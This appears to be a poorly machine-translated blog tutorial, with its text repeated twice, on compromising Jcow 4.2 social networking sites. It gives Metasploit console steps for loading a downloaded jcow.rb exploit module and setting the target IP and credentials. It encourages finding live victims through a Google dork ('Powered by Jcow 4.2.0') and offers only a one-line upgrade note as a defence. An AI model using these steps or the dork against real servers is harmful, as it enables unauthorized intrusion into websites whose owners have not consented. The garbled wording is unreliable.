Do your friends ever see the CMS on this one? Jcow social networking ... Yes, it was the name ... Jcow offer web-based applications for social networking site for free alias free and can be viewed at their website with a fairly small file size is only 777KB of not more than 1 MB.
But here I will discuss is not about the use of the Jcow this as a friendship site, but the presence of a vulnerability of some version of Jcow which turned out to be compromised in just 4 steps , And even the intruder can see the contents of the victim web server directory (if it turns out the server did not implement good security).
In the example I will make below, using the victim's IP: ...
Much better if my friends want to learn using a virtual lab first, but if it's curious to direct to the wild arena, folks can also search via google dork: "Powered by Jcow 4.2.0". If you are interested to go directly to the real world, my friends also have to learn the logic of the attack techniques via the internet ( click here )
OS Attacker: BT 5 R1
Victim OS: XP SP3
Vulnerable applications: Jcow 4.2
In my previous article has also been made username: "victim and the password:" victim "in the application Jcow target.
Okay we start step by step below
1. Metasploit Framework (
2. Jcow.rb exploit script ( mediafire link on the website of origin )
The steps:
1. Copy the file jcow.rb exploits that have been downloaded into the folder / pentest / exploits / framework / modules / exploits / remote /
jcow.rb cp / pentest / exploits / framework / modules / exploits / remote /
If confused how to copy my files into Backtrack Linux exploit.rb, folks can see the tutorial here .
2. Open msfconsole metasploit console by typing in a terminal, then use the previous exploits that we copied earlier.
msf> use exploit / remote / Jcow
3. Next type the command show switch options to see what can be used to exploit this.
msf exploit (Jcow)> set rhost -> IP target
rhost =>
msf exploit (Jcow)> set username victim -> sets the username
username => victim
msf exploit (Jcow)> set password victim -> set password
password => victim
4. Yep after everything is done properly configured, the last step just run the command on the console metasploit exploit.
1. Upgrade to the latest version Jcow
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But here I will discuss is not about the use of the Jcow this as a friendship site, but the presence of a vulnerability of some version of Jcow which turned out to be compromised in just 4 steps , And even the intruder can see the contents of the victim web server directory (if it turns out the server did not implement good security).
In the example I will make below, using the victim's IP: ...
Much better if my friends want to learn using a virtual lab first, but if it's curious to direct to the wild arena, folks can also search via google dork: "Powered by Jcow 4.2.0". If you are interested to go directly to the real world, my friends also have to learn the logic of the attack techniques via the internet ( click here )
OS Attacker: BT 5 R1
Victim OS: XP SP3
Vulnerable applications: Jcow 4.2
In my previous article has also been made username: "victim and the password:" victim "in the application Jcow target.
Okay we start step by step below
1. Metasploit Framework (
2. Jcow.rb exploit script ( mediafire link on the website of origin )
The steps:
1. Copy the file jcow.rb exploits that have been downloaded into the folder / pentest / exploits / framework / modules / exploits / remote /
jcow.rb cp / pentest / exploits / framework / modules / exploits / remote /
If confused how to copy my files into Backtrack Linux exploit.rb, folks can see the tutorial here .
2. Open msfconsole metasploit console by typing in a terminal, then use the previous exploits that we copied earlier.
msf> use exploit / remote / Jcow
3. Next type the command show switch options to see what can be used to exploit this.
msf exploit (Jcow)> set rhost -> IP target
rhost =>
msf exploit (Jcow)> set username victim -> sets the username
username => victim
msf exploit (Jcow)> set password victim -> set password
password => victim
4. Yep after everything is done properly configured, the last step just run the command on the console metasploit exploit.
1. Upgrade to the latest version Jcow